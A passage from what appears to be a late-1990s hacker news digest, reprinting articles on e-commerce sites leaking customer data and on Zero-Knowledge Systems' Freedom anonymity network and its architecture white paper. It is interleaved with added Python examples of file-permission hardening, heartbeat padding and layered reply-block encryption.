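        os.path.join(root, "smps", "private.cfg"): (b"secret=1\n", 0o600),
    }
    for path, (content, mode) in samples.items():
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel, flagged in audit_tree(sample_root):
        print(("!! " if flagged else "   ") + rel)
    print("entries fixed:", lock_down(sample_root, audit_tree(sample_root)))
```

        Run it against the document root or the Cybercashserver/smps tree. World-readability is a
        necessary check, not a sufficient one: a file the web server's own user can read is still
        served if it lies under the document root, so customer data also belongs outside that root.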

     
     
     
 06.1  E-commerce boom fueling Security Holes?     
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
       
       http://www.thestandard.net/articles/display/0,1449,4307,00.html?home.tf
       
       E-commerce Boom Fueling
       Security Holes? 
 
       By Jack McCarthy and Elinor Mills 
 
        Recent breaches of customer privacy by online stores show that early
        concerns for Internet security were justified, industry experts said,
        adding that smaller businesses rushing to get online are often the 
        culprits. 
 
       Just this week, an employee at an Internet service provider in Bellevue,
       Washington, posted a warning on the Internet to systems administrators 
       and Web developers about the potential for Web sites exposing
       information as a result of misconfigured e-commerce software. 
 
       Joe Harris, systems administrator for Blarg Online Services which hosts 
       e-commerce sites for companies, said Thursday that he discovered last 
       week that more than 100 online stores hosted by Blarg were inadvertently 
       revealing customer names, addresses, credit card numbers and other
       purchasing information. One of the ways random Internet users could access 
       the information was by using certain keywords while doing searches on the 
       sites, he said. 
 
       Since he posted the warning, many of the affected Web sites have corrected 
       the problem, Harris said, but at least two stores were still exposing 
       customer information on their sites Thursday. 
 
       Such privacy breaches are expected to increase as more retailers go online. 
 
       "With the growth of the Internet and the use of e-commerce, you're going to get
       more and more of these situations," said Bob Lewin, executive director of TRUSTe, a
       Cupertino, Calif.-based group that monitors online privacy practices and offers seals of
       approval to Web sites that agree to follow basic privacy guidelines. 
 
       Experts say the privacy breaches seem to be happening primarily with smaller
       companies that might not have the expertise and sophistication to properly install
       electronic commerce software or the money to hire experienced firms to do it for them. 
 
       "It's definitely an issue that impacts smaller online merchants that are either using
       multiple site hosting services or are building their own using these simpler [turnkey]
       commerce packages," said David Kerley at Jupiter Communications market research firm
       in New York. "It's an area that larger online merchants are more sensitive to and more
       knowledgeable about." 
 
       Along with the dramatic growth of e-commerce, smaller companies are racing
       to sell online and creating greater demand than can be met for people who know how
       to create secure Web sites, according to Kerley, "so people who aren't as experienced
       are getting into the business." 
 
       Amateur Web designers can fail to follow instructions in using shopping-cart software
       that takes orders from customers, Harris said. When the software is improperly
       installed, the information can be exposed, for instance by being stored on a file that is
       accessible to web surfers, he said. 
 
       Many small retailers use friends or untested companies to develop their Web sites, Harris
       said. "They hear that their sister-in-law's cousin can do it, so they hire him," he said. 
 
       Basically, companies should be careful in selecting firms to set up and host their 
       e-commerce sites by getting references, using established firms and asking about privacy
       and security upfront, the experts said. If they don't they'll not only lose
       customers but growth of e-commerce in general will be impeded,
       Lewin of TRUSTe said. "If you are going to put your store on the Web,
       you are responsible for the information that's there," Harris said. "Your
       client is trusting you to make sure you do everything in your power to
       make sure that data is safe." 
 
       While smaller companies may be primarily at fault for privacy breaches
       lately, data exposures at Web sites run by larger companies also can
       happen and when they do they can pose an even greater risk,
       according to Ari Schwartz, policy analyst at the Center for Democracy
       and Technology in Washington, D.C. 
 
        "Smaller companies do cut corners, but the larger companies usually
        have large databases and there's a lot more at stake," he said. "So
       both [types of companies] need to pay adequate attention, especially
       those people implementing software solutions for large numbers of
       small companies." 
 
       At the same time, companies are becoming more aware of the
       necessity for security. Nearly 700 Web sites are members of Truste
       and more are joining all the time, Lewin said. "The majority of our
       licensees are smaller organizations," he said. They "don't have time to
       do the necessary investigations to find out what they should be doing
       in the first place." 
 
       On their end, consumers should try to find out how secure the sites
       they buy things from are. "It's no different than other markets. Buyer
       beware," said Kerley of Jupiter. 
 
       There also need to be technical solutions that make it easier for
       people to read privacy notices online so they can determine whether
       the Web site is as secure as they want it to be, said Schwartz of the
       CDT. 
 
       "Seems as though it takes a violation of peoples' privacy to make
       people pay attention," Schwartz added. 
 
       The federal government may eventually give online merchants a push
       in the direction of guaranteeing security. Although the Clinton
       administration favors allowing the industry to regulate itself, agencies
       such as the Department of Commerce and the Federal Trade
       Commission have been discussing how to encourage privacy
       protection and lawmakers have talked about enacting laws that would
       make Web sites liable for privacy breaches on their sites. 
 
       Despite the privacy lapses that are occurring in the retailer rush to
       sell online, the risk is still minimal to most consumers, according to
       Kerley at Jupiter. 
 
       "There's not a huge risk for the consumer except to maybe have to
       cancel a credit card," he said. "There are far more shady businesses
       that are not on the Internet that have access and do access personal
       information of a more sensitive nature. All it takes is a few dollars to
       get a credit rating and credit report," for example, Kerley said. 
 
       Jack McCarthy and Elinor Mills write for the IDG News Service. 
       
       @HWA
 
 
 
 07.0  Anonymity guaranteed (PCworld)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
       http://www.pcworld.com/pcwtoday/article/0,1510,10700,00.html
       
       Anonymity Guaranteed on the Net 

       For $9.95 per year, ISPs will erase all trace of your
       Web travels.

       by David Needle, special to PC World 
       April 26, 1999, 9:48 a.m. PT 

       Superman had a secret identity, and soon you may too, thanks to Zero Knowledge Systems, an Internet
       security company that wants to give Web surfers total online privacy.

       ZKS has created the Freedom Network, a band of 50 Internet service providers that route encrypted data
       through what the company says is an untraceable path. Any data that represents your presence on the
       Internet is encrypted and bounced around servers in the Freedom Network so there is no digital trail of who you
       are or where you've been.

       For the time being, participation in the Freedom Network is free while participating ISPs finish testing
       their software. A full-fledged Windows-based client is due out later this summer for $49.95, complete with five
       secret identities, aka "nyms," or pseudonyms. A 45-day free trial version will also be available. After the
       first year, the cost is $9.95 per year, per nym.
       
       "We're giving Internet users total privacy, which they've never had before," says Austin Hill, president of Zero
       Knowledge Systems. "We don't even ask you to trust us because even we don't know where you are browsing."

        You don't even have to belong to a Freedom Network ISP to join, though Hill says there may be some
        performance advantage if you do. ISPs in the Freedom Network tend to be small to midrange players, with
        larger Web providers taking a wait and see approach. "Later on we'll want to bring some of the larger ISPs on
        board," says Hill.

       The Downsides of Privacy

        "The privacy feature can't degrade the user experience; it has to be invisible," says Jim Balderston, Director of
       Zona Research. "And if you are promising 100 percent privacy protection, you have to deliver because
       consumers aren't going to accept anything less."

       Some people worry that greater Internet anonymity means more scam artists and criminal activity. For
       example, an anonymous Web surfer might have an easier time harassing people online. However, ZKS
       attempts to limit online harassment by honoring requests not to receive e-mail from nyms. And
       harassment should be somewhat limited because it costs money to establish a pseudonym, according to
       Hill.

       "Like all freedom, this can be abused or used for good," says Hill. But, he adds, "we don't outlaw cars because
       people sometime have accidents in them." 

       Worth the Price? 

       Still, are privacy guarantees worth even a small price to your average, law-abiding Web user already paying $20
       or more per month to get online?

       For a lot of people, yes. Parents, for example, might join the Freedom Network so that their children can
       participate in online chat rooms without divulging their identity.

       "The issue of privacy is a substantial one," says Zona's Balderston. "People don't realize how much information
       has already been gathered about them. When you start seeing pop-up screens that say 'You bought boots at
       such-and-such a Web site, now check out our camping gear,' that will be distressing to a lot of people; they're
       going to look for some way to have anonymity online."

        ISPs also benefit from joining the Freedom Network, Hill says, because it limits their legal liabilities. "We've
       seen cases where users get into a flame war that ends up in a civil suit and the ISP gets dragged in," says
       Hill. "It's a lot easier to be able to say, 'I don't have any data on this.' It's an encrypted stream of traffic."

       "Our customers are deeply concerned about online privacy," says Paul Engels, vice president of I.D.
       Internet Direct, Canada's second largest ISP and a member of the Freedom Network. Engels calls the ZKS
       network "the most comprehensive and credible effort to put privacy back where it belongs--in our customers
       hands." 
       
       @HWA
 
 
 
 
 07.1  Anonymity guaranteed?
       ~~~~~~~~~~~~~~~~~~~~~ 
       
       FreedomTM is easy-to-use software designed to give you total privacy
      while on the Internet. This driver-level software runs in conjunction
      with all your current Internet software, ensuring your privacy in a
      totally transparent, unobtrusive way. Freedom uses high-grade public
      key cryptography to encrypt the contents of any Internet
      transmission, including e-mail, chat room, web browsing and
      newsgroups. It also protects the source and destination of all Internet
      traffic. 

      Freedom simultaneously 

           manages all of your digital identities, 
           watches all outbound traffic for personal information and
           automatically encrypts and routes traffic through the Freedom
           network, 
           transparently decrypts all incoming traffic, 
           places cookies into Cookie JarsTM, 
           filters spam. 

      Customized pseudonyms to manage your identities 

      Freedom allows you to create one or several digital pseudonyms. A
      digital pseudonym lets you create a unique online identity for yourself
      (which may or may not be like your true self) that you can use to
      perform all your Internet-related tasks. You are the sole owner of the
      pseudonyms, which can be configured to have different e-mail
      addresses, geographic locations and encryption keys. Different
      pseudonyms give you the opportunity to separately explore
      completely different areas of the Internet and avoid being profiled by
      Internet marketers. 

      Who do you want to be today? 

      You choose how to use your online identities. For example, if you like
      to debate politics online you can designate one pseudonym as your
      "politics" pseudonym. Use it when you post in political newsgroups,
      surf activist web sites, e-mail your political contacts and chat in
      political chat rooms. No one can trace it back to your real self. 

      Any concern you have about people monitoring you or collecting your
      personal information on the Internet is gone. Your boss will not be
      able to find out what you like to chat about on your own time.
      Marketers cannot generate a profile of you and put you onto mailing
      lists without your consent. 

      No one--not even Zero-Knowledge Systems--will be able to find out
      who is behind a digital identity. 

      Full strength encryption and Cookie JarsTM 

      Each digital identity uses full strength encryption that ranges from
      128-4096 bits. This transparent encryption permits all outgoing
      Internet packets, e-mail and newsgroup postings to be encrypted,
      and where appropriate, digitally signed by the pseudonym's public
      key. 

      Every Freedom user is connected to a Freedom server that
      anonymizes source information to protect your identity. When
      sending e-mail both the sender and recipient's addresses are
      encrypted, as well as the message itself. 

       Many web sites place cookies (little bits of information) on your
      computer to record and customize your visit. To prevent cookies from
      revealing or correlating any of your identities, Freedom has a cookie
      management system called Cookie Jars. Each digital identity has its
      own Cookie Jar, and any cookie received by that identity is collected
      in its individual jar. This way, your digital identities remain completely
      separate from each other and from your real self. 

      Advanced spam control 

      Freedom also has advanced spam filtering tools so you can filter out
      unwanted, unsolicited e-mail sent to your pseudonyms. When
      enabled, Freedom's anti-spam functions eliminate 100% of unwanted
      bulk email before it even gets to your mailbox. 

      For a complete list of Freedom's features and technical details, see
      the white paper. 
      
      
       
 07.2  ZKS White paper
       ~~~~~~~~~~~~~~~
       
       For diagrams (there are only two) view in html mode or visit this url
       http://www.zeroknowledge.com/products/Freedom_Architecture.html
       
        The Freedom Network Architecture
                                                                 (Version 1.0)
                                                         Zero-Knowledge Systems, Inc.
       
       This document describes the architectural components of the Freedom network. This document is intended for system administrators and potential Freedom Server operators. A solid
       understanding of networking terminology and acronyms, such as SMTP, POP3, HTTP, TCP/IP, etc. is assumed. Familiarity with previously deployed building blocks of Internet privacy
       systems, such as nymservers and remailers, is desirable. If you are unfamiliar with any of the above, please consult the sources listed in the bibliography at the end of this document.
       
       
        [Diagram: cloud_diagram.gif, http://www.zeroknowledge.com/products/cloud_diagram.gif]
         
       
       Client-server Architecture
       
       The Freedom product is composed of two primary elements: the client application and the server network. Any Internet user wishing to protect their privacy needs the Freedom client
       application installed on their computer. The client application is compatible with current Internet protocols and works transparently. The server network is known as the Freedom
       network. The Freedom network is made up of numerous Internet servers running the Freedom server-side application. The Freedom network provides a mechanism to ensure anonymous
       connections between user and destination.
       
         
       
       Freedom Network Components
       
       Freedom Server Nodes
       
        The Freedom Server Nodes are at the core of the Freedom network. Freedom Server Nodes have been deployed by ISPs, individuals, and organizations worldwide. The nodes are owned
        and operated by Freedom partners independently of Zero Knowledge Systems. This assures that the user's privacy will be protected even if Zero Knowledge Systems itself were subject
        to compromise. Each Freedom Server Node is comprised of four logical sub-systems. The subsystems are: Anonymous Internet Proxy (AIP), Anonymous Mail Proxy (AMP), Wormhole,
        and Traffic Shaper.
       
         
       
       Anonymous Internet Proxy (AIP)
       
       The AIP provides the underlying anonymous TCP/IP connections. While current Freedom clients support only TCP-based protocols (with the exception of DNS), the AIP itself operates
       at the IP level, thus allowing maximum flexibility for future feature enhancements and support for non-TCP based protocols. Each AIP performs the following actions upon startup.
       
       Initialization 
       
       On start-up, the AIP loads its key cache stored on the local disk, and examines it to see which keys have expired. Each AIP has a list of five topologically neighboring AIPs stored on the
       local machine. (During the beta test, this list of neighboring AIPs is manually entered to the Freedom Server Node). A query is then sent to the Network Information Database (NIDB)
       server to retrieve a list of encryption keys for the other AIPs in the cloud that may have expired prior to initialization. This query, as all communication between components in the cloud,
       is performed using an Anonymous TCP (ATCP) connection.
       
       Establishing Routes to Neighbors
       
       Reading the list of neighbors, the AIP sends "PADDING" packets through UDP to the neighbors. These packets have the same size as payload packets to provide "for free" cover traffic.
       The use of PADDING packets and cover traffic introduces the notion of a Heartbeat amongst the AIPs. A heartbeat is defined as the time delay at which a packet must leave the machine
       for a specific neighbor, hiding any information of the AIP server's status (idle or busy). The heartbeat concept prevents traffic analysis to a significant degree. Since packets are sent out
       on a regular basis, and knowing the rate at which these heartbeat packets arrive at a machine, an AIP can determine if a neighbor is unreachable since it will fail to send an ALIVE packet
       after a certain amount of time. PADDING packets further prevent traffic analysis by maintaining a constant data flow between the AIPs. In addition, all data is link encrypted between two
       adjacent routers with a shared session key.
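        To make the heartbeat and PADDING mechanism concrete, here is an added simulation; it is
        not Zero-Knowledge code, and the packet size, heartbeat interval and miss limit are assumed
        constants. One AIP's outbound link emits exactly one fixed-size packet per heartbeat,
        whether payload or padding, and the neighbour's monitor derives liveness purely from that
        rhythm, treating any packet, padding included, as the ALIVE signal.

```python
from collections import deque

PACKET_SIZE = 64        # constructed: fixed on-the-wire size of payload and PADDING packets
HEARTBEAT = 1.0         # constructed: seconds between packets on each neighbour link
MISSED_LIMIT = 3        # constructed: heartbeats a neighbour may miss before it is marked unreachable


class HeartbeatLink:
    """Outbound side of one AIP-to-neighbour link. Every heartbeat exactly one packet of
    PACKET_SIZE leaves, whether or not real data is queued, so an observer on the wire
    cannot tell an idle AIP from a busy one."""

    def __init__(self):
        self.queue = deque()
        self.sent = []  # (time, kind, wire bytes) kept for inspection

    def enqueue(self, payload: bytes):
        if len(payload) > PACKET_SIZE - 1:
            raise ValueError("payload larger than one packet")
        self.queue.append(payload)

    def tick(self, now: float) -> bytes:
        """Called once per heartbeat. Tag byte 0x01 = payload, 0x00 = PADDING; both padded to size."""
        if self.queue:
            body, kind = self.queue.popleft(), b"\x01"
        else:
            body, kind = b"", b"\x00"
        wire = kind + body + b"\x00" * (PACKET_SIZE - 1 - len(body))
        self.sent.append((now, "payload" if kind == b"\x01" else "padding", wire))
        return wire


class NeighborMonitor:
    """Inbound side: liveness from the packet rhythm alone."""

    def __init__(self, start: float):
        self.last_seen = start

    def observe(self, now: float):
        self.last_seen = now

    def is_reachable(self, now: float) -> bool:
        return now - self.last_seen < MISSED_LIMIT * HEARTBEAT


def simulate(ticks: int, payloads_at: dict, neighbor_silent_from: int):
    """Run one link for `ticks` heartbeats. payloads_at maps tick index -> payload to queue;
    the neighbour stops sending at tick neighbor_silent_from. Returns (link, reachable-by-tick)."""
    link, monitor, status = HeartbeatLink(), NeighborMonitor(0.0), []
    for i in range(ticks):
        now = i * HEARTBEAT
        if i in payloads_at:
            link.enqueue(payloads_at[i])
        link.tick(now)
        if i < neighbor_silent_from:
            monitor.observe(now)
        status.append(monitor.is_reachable(now))
    return link, status


if __name__ == "__main__":
    link, status = simulate(8, {1: b"data-a", 2: b"data-b"}, 5)
    for (t, kind, wire), alive in zip(link.sent, status):
        print("t=%.0f %-7s %d bytes  neighbour reachable: %s" % (t, kind, len(wire), alive))
```

        The point the prose makes in words is visible in the output: the packet count and size are
        the same with two queued payloads as with none, and the neighbour is declared unreachable
        only after MISSED_LIMIT heartbeats of silence.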
       
       Payload Route Creation
       
       The originator of a connection chooses a route to follow through the anonymous cloud. The route consists of a user-definable number of AIP jumps within a system-wide minimum and
       maximum of jumps. By imposing a minimum number of jumps, the anonymity of the transaction is guaranteed. The maximum number of jumps is imposed to establish a maximum packet
        size. The default number of jumps is three.
       
       The route is created with information that includes Anonymous Connection IDs (ACIs), the next AIP hop for the current route, client/AIP symmetric keys, cryptographic algorithms, and
       expiry time of the route.
       
       The originator of an anonymous connection has an initial cache of routes to travel through the cloud. This cache is validated and an initial Anonymous TCP (ATCP) connection is made
       with an AIP. This selection is a general case of route selection (using a limited subset of AIPs). Next, the client requests a set of routes and signing keys from the AIP it is connected to.
       The AIP then sends the routes and signing keys to the client. Once verified, the local routing table is updated. This ensures that as little correlation as possible can be made between the
       request for the initial set of routes and the creation of a digital identity (and corresponding route). Requesting these routes from a single source would enable easy monitoring of such
       requests. Using the cloud as the source of routes hides this action from observers.
       
       Once the client receives a topological map and a link state table, it can proceed to compute a path from an input to an exit AIP. 
       
                           Users may choose to activate Freedom's Automatic Route Selection feature, which adheres to the following specification:
       
                           For performance reasons, select an entrance AIP "close" to the client, where close is defined as being topologically close. This could potentially reveal
                           some information, but it is felt that the increased performance is worth the risk of exposure.
       
                           Subsequently, the following AIP is selected at random, and may include any available AIP, excluding any previously visited AIPs. This step is repeated
                           until the final hop is selected.
       
       At route creation time, the first packet uses a public key algorithm to create a session key. The session key is used to encrypt all other packets sent between AIPs for that specific
       Anonymous Connection ID (ACI). The payload of the anonymous packet should, at all times, be encrypted when it travels through the anonymous cloud. The only time the payload may
       be "in the clear" (i.e.: the session key is decrypted) is once the data exits the anonymous cloud at a Wormhole.
       
        To prevent traffic analysis, the lengths of the packets are independent of the amount of data inside the packets; padding is added within each packet to ensure this. Route creation
        packets are protected against traffic analysis by employing a second size of PADDING packet.
       
       In order to jump from one AIP to another, the following process occurs:
       
           1. Decrypt link encryption on the header. If the packet contains a CREATE command in the header, the decryption will occur using the AIP's private key. For all subsequent traffic, a
              symmetric key is used for link decryption. 
           2. Process header information. The AIP responds to various header commands that include CREATE (open a path) and DESTROY (close a path). This header information is
              different from the header of the packet that is being sent from the client. The header the AIP reads contains added information, such as the nature of the packet, the size of the
              message packet, and the amount of padding. In the case of a packet with a CREATE header, the information decrypted from the header would include the following elements: 
        
              Forward cryptographic algorithm. 
              Backward cryptographic algorithm. 
              The IP address and port number of the next hop. 
              Expiry time of the route. 
              A selected number of bits of key seed material to get a symmetric key for the rest of the data. 
        
           3. Decrypt/encrypt the rest of the packet information. This is done using the key seed material found from within the CREATE packet header that was decrypted upon arrival at the
              AIP. This is used for the forward and backward decryption keys. 
           4. Take the appropriate action. This includes table update and lookup actions. For example, a table lookup is performed to confirm if the ACI is currently valid; the encryption key
              and algorithm are retrieved from the table and applied to the payload (encryption or decryption based on the ACI). A new header is created with the corresponding ACI. The
              header is encrypted using the link encryption key and the packet is sent to the next host in the chain. 
           5. Create new header. A new ACI is selected and the packet is then padded to maintain the packet's size. 
           6. Encrypt the header with the link encryption key for the next host. The packet is encrypted using the link encryption key of the next AIP in the route. 
           7. Send the new packet to the next hop in the chain. The packet is released from the AIP and sent to the next one specified in the route. 
           8. Deliver data to destination. When the number of jumps has met the number specified by the client, the packet is sent to the Wormhole by the final AIP in the route. 
       
         
       
       Anonymous Mail Proxy (AMP)
       
       The Anonymous Mail Proxy (AMP) provides for both outgoing and incoming mail delivery services. It accepts email from digital identities and processes the mail by holding it for a
       random amount of time and reordering all messages being held at this AMP. After the "holding" time expires, the message is sent from one AMP to another, preserving the anonymous
       connection. This is done using the Anonymous Mail Transfer Protocol (AMTP).
       
       The packet format of an AMTP packet has three parts:
       
            Send or Reply Blocks 
            AMTP to SMTP headers which can change in transit 
            Message body 
       
       This information jumps from one AMP to another with varying levels of details and instructions, depending on which stage of the transfer is occurring.
       
       Before any mail transfer occurs using a digital identity, a public key is created for each identity. The Freedom client then creates up to three reply blocks for each identity. The reply
       blocks outline the route that mail packets will follow through the cloud (i.e.: instructions for each AMP, so they know where the packet should be sent after it has been reordered and held
       in its queue). Each reply block consists of encryption keys and addresses for three selected AMPs in a specific route. The redundancy of three reply blocks is required in case one of the
       AMPs (used in one of the reply blocks) is inoperable. The reply blocks are encrypted with the nymserver's public key and are sent to reside there. Future versions of Freedom will
       implement more advanced methods of anonymous mail transport without the need for reply blocks.
       
       Layered encryption is used because the user's real email address resides within the reply block of the digital identity. In a case where a digital identity receives email, the user's real
       address should be kept secure until it reaches the last AMP in the return chain (which sends the message to the user's address). Although the final AMP knows the user's real email
       address, it must not know the content of the message, the pseudonym under which it was originally addressed, or the origin of the message. Using layered encryption, and a lookup table
       within the nymserver, confidentiality can be achieved through the reply blocks.
       
       
        [Figure: reply block layering, http://www.zeroknowledge.com/products/reply_block.gif]
       
       
       
       Incoming Email
       
        Once incoming mail arrives for a digital identity, the nymserver looks up the identity's reply block. Each layer of the reply block consists of three items:
       
            The next destination in the chain (AMP or real email address) 
            A symmetric key 
            The remaining content of the layered reply block. 
       
        The nymserver decrypts the outer layer of the reply block with its private key, and reads the next destination AMP, a symmetric key, and the remainder of the layered reply
        block. The nymserver uses the symmetric key to encrypt the mail message, then the message and the remaining reply block are sent to the next AMP. This AMP decrypts its layer
        of the reply block to reveal the next destination and another symmetric key, encrypts the mail message with this new key, and sends the remainder of the reply block and the mail
        message on to the next destination. The third AMP receives the message and the block, decrypts the block to discover a destination and a key, and encrypts the message with
        that key. The destination this time, however, is not an AMP, but the user's real email address. Note that, at this point, the AMP does not know where the original message came
        from, nor its content (it is multiply encrypted), and the pseudonym is no longer present because the header of the message itself is encrypted and the reply block is entirely
        de-layered. The message is sent to the user at the user's email address.
       
       Considering the conditions from the previous Web browsing example, with 3 AMPs denoted A, B, and C, and the real user real@address.ca and the pseudonym mynym@freedom.net,
       we get the following:
       
           1.Mail (denoted M) arrives at the Freedom nymserver addressed to mynym@freedom.net. The reply block for mynym (denoted BC) is found within a table. The nymserver can be
             considered as being AMP-C. 
           2.The reply block is decrypted using the nymserver's private key. 
           3.AMP-C finds itself in possession of the details for the next destination (AMP-B), and a symmetric key, denoted KC. AMP-C encrypts the message with KC (i.e., EKC(M)), and
             sends the message and what remains of the reply block, being BB, to AMP-B. 
           4.AMP-B receives the message and the block. AMP-B decrypts the block and finds the next destination details (AMP-A) and a symmetric key, denoted KB. AMP-B performs
             EKB(EKC(M)) and sends the message and the remainder of the block, being BA, to AMP-A. 
           5.AMP-A receives the message and the block. AMP-A decrypts the block and finds real@address.ca and a symmetric key, denoted KA; the block is now empty. AMP-A performs
             EKA(EKB(EKC(M))) and sends the message to real@address.ca. 
           6.The user (real@address.ca) receives the message, strips the three layers in the order KA, KB, KC, and finds itself in possession of the original message M. 
       
       Through this process, the digital identity's integrity remains intact, the AMPs in the route are not aware of the message's content, and the mail is received.
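        The six steps above, as an added Python walk-through (example code written for this digest, not Zero-Knowledge's): build_reply_block() is the client building BC
        around BB around BA, process_at_hop() is what AMP-C (the nymserver), AMP-B and AMP-A each do, and user_unwrap() is step 6. Two assumptions keep it standard-library
        only: each node's layer is sealed with a per-node secret key rather than the node's public key, and the symmetric cipher is an HMAC-SHA256 counter-mode stream cipher
        with an authentication tag. Node names, the real address and the message text are the paper's illustrative values; the keys are generated at run time.

```python
"""Layered reply block walk-through for the AMP chain described above.

Added example, not Zero-Knowledge Systems code. Assumptions: every node's
layer (nymserver and each AMP) is protected with a per-node secret key instead
of the node's public key, and the cipher is an HMAC-SHA256 counter-mode stream
cipher with an HMAC tag, so only the Python standard library is needed.
"""
import hashlib
import hmac
import os
import struct

KEY_LEN = 32
NONCE_LEN = 16
TAG_LEN = 32


def _subkeys(key):
    """Derive separate encryption and MAC keys from one node or hop key."""
    enc = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac = hmac.new(key, b"mac", hashlib.sha256).digest()
    return enc, mac


def _keystream(enc_key, nonce, length):
    """Counter-mode keystream: block i = HMAC-SHA256(enc_key, nonce || i)."""
    out = bytearray()
    for i in range((length + 31) // 32):
        out += hmac.new(enc_key, nonce + struct.pack(">Q", i), hashlib.sha256).digest()
    return bytes(out[:length])


def sym_encrypt(key, data):
    """Encrypt-then-MAC: nonce || ciphertext || tag."""
    enc, mac = _subkeys(key)
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(a ^ b for a, b in zip(data, _keystream(enc, nonce, len(data))))
    return nonce + ct + hmac.new(mac, nonce + ct, hashlib.sha256).digest()


def sym_decrypt(key, blob):
    """Verify the tag first; a layer not built for this key fails closed."""
    enc, mac = _subkeys(key)
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(mac, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("layer failed authentication")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc, nonce, len(ct))))


def _pack_layer(next_hop, hop_key, remainder):
    """One layer in the clear: next destination, symmetric key, rest of block."""
    hop = next_hop.encode()
    return struct.pack(">H", len(hop)) + hop + hop_key + remainder


def _unpack_layer(plain):
    (n,) = struct.unpack(">H", plain[:2])
    next_hop = plain[2:2 + n].decode()
    return next_hop, plain[2 + n:2 + n + KEY_LEN], plain[2 + n + KEY_LEN:]


def build_reply_block(route, node_keys, real_address):
    """Client side. route lists hops in delivery order, e.g. ["nymserver",
    "AMP-B", "AMP-A"]. Returns the outermost block (BC) and the per-hop
    symmetric keys (KC, KB, KA) the client must keep in order to read mail."""
    hop_keys = [os.urandom(KEY_LEN) for _ in route]
    destinations = route[1:] + [real_address]
    block = b""                                   # innermost remainder is empty
    for hop, dest, k in reversed(list(zip(route, destinations, hop_keys))):
        block = sym_encrypt(node_keys[hop], _pack_layer(dest, k, block))
    return block, hop_keys


def process_at_hop(node_key, block, message):
    """What the nymserver or an AMP does: peel one layer, wrap the message."""
    next_hop, hop_key, remainder = _unpack_layer(sym_decrypt(node_key, block))
    return next_hop, remainder, sym_encrypt(hop_key, message)


def deliver(node_keys, first_hop, block, message):
    """Walk the chain; returns (final destination, ciphertext, hops visited)."""
    hop, path = first_hop, []
    while True:
        path.append(hop)
        hop, block, message = process_at_hop(node_keys[hop], block, message)
        if not block:                 # empty remainder: next hop is the real address
            return hop, message, path


def user_unwrap(hop_keys, ciphertext):
    """The user strips the layers in reverse order of application: KA, KB, KC."""
    for k in reversed(hop_keys):
        ciphertext = sym_decrypt(k, ciphertext)
    return ciphertext


def demo(message=b"mail for mynym@freedom.net"):
    node_keys = {n: os.urandom(KEY_LEN) for n in ("nymserver", "AMP-B", "AMP-A")}
    block, hop_keys = build_reply_block(["nymserver", "AMP-B", "AMP-A"], node_keys, "real@address.ca")
    dest, ciphertext, path = deliver(node_keys, "nymserver", block, message)
    return dest, path, ciphertext, user_unwrap(hop_keys, ciphertext)


if __name__ == "__main__":
    dest, path, ct, plain = demo()
    print(" -> ".join(path), "->", dest)
    print("last AMP forwards:", ct[:16].hex(), "... user reads:", plain.decode())
```

        Run stand-alone it prints the path nymserver -> AMP-B -> AMP-A -> real@address.ca. Two properties worth checking when reading it: deliver() never hands a hop anything
        but the next destination, one fresh key and an opaque remainder, and the tag check in sym_decrypt() means a hop that receives a block not built for it fails closed
        instead of forwarding garbage.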
       
       Outgoing Email
       
        Using the Anonymous Mail Transfer Protocol (AMTP), the Freedom client software deposits outgoing mail into a reordering pool at the Freedom Mail Gateway. Currently, there is only one
        such pool operated by ZKS. Additional pools are expected in the future.
       
       The digital identity's digital signature is applied to the original message at the client (prior to its multiple encryption), and its integrity is verified by the nymserver before the message is
       sent.
       
        The digital identity is not known to any of the AMPs, with the exception of the nymserver. The integrity of the pseudonym is maintained, and the confidentiality of the message headers
        is maintained until the Freedom Mail Gateway. Since the digital identity's digital signature is used, the integrity of the message and the sender can be verified prior to its release, thus
        guarding against impersonation of the digital identity.
       
         
       
       Wormhole
       
       The Wormhole is the interface between the anonymous network cloud and Internet hosts accessed by the end user. When a new ACI is presented to the wormhole, the wormhole
        assigns a new port for it to pass TCP/UDP traffic. The wormhole, however, does not monitor the state of the TCP connection; the AIP will notify the wormhole that a route has been
       destroyed, so the wormhole can release the port-to-ACI map. The wormhole only responds to address requests for its own IP address. Any remaining relevant personal information is
       stripped, and the packet goes into the real world of the Internet.
       
         
       
       Traffic Shaper
       
       The Traffic Shaper fulfills a dual role as both Internet bandwidth throttle and link padding envelope shaper.
       
       Bandwidth Throttle
       
       Most Freedom Server operators will not be able to dedicate their entire upstream connectivity bandwidth to Freedom. The Bandwidth Throttle settings determine the maximum bandwidth
       that will be allocated by the Freedom Server to anonymous Internet connections.
       
       Link Padding Envelope Shaper
       
       Inter-AIP link padding is required to prevent traffic analysis of data passing over AICs. However, the outer bandwidth envelope does not have to continually be operated at the maximum
       bandwidth allowed by the Bandwidth Throttle. As long as the outer envelope modulation is kept independent of the data flowing through the link, information leakage will not occur. To
       minimize bandwidth costs, the Link Padding Envelope Shaper modulates the outer link envelope as determined by a formula that takes into account historical usage patterns and traffic
       flows.
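        The leakage condition above (the outer envelope must be independent of the data flowing through the link) is easy to get wrong, so here is an added example, not
        Zero-Knowledge's code: a toy per-tick shaper in Python. shape() emits exactly min(envelope, throttle) bytes every tick, queuing real data that does not fit and padding
        the rest; reactive_shape() is the mistake it guards against, an envelope that follows current demand with only a padding floor. The envelope schedule, tick size and byte
        counts are constructed inputs, and the paper does not publish the formula that derives the envelope from historical usage, so that part is not modelled.

```python
"""Toy link padding shaper: the wire trace must not depend on the payload.

Added example. The envelope schedule and byte counts below are constructed
inputs, not figures from the Freedom paper.
"""


def shape(payload, envelope, throttle):
    """Data-independent shaper.

    payload  : real bytes offered by the AIP per tick
    envelope : outer envelope (bytes per tick) fixed without looking at payload
    throttle : Bandwidth Throttle cap in bytes per tick
    Returns (wire, delivered, backlog): bytes seen on the link per tick, real
    bytes that fit per tick, and real bytes still queued at the end.
    """
    pending, wire, delivered = 0, [], []
    for t, env in enumerate(envelope):
        pending += payload[t] if t < len(payload) else 0
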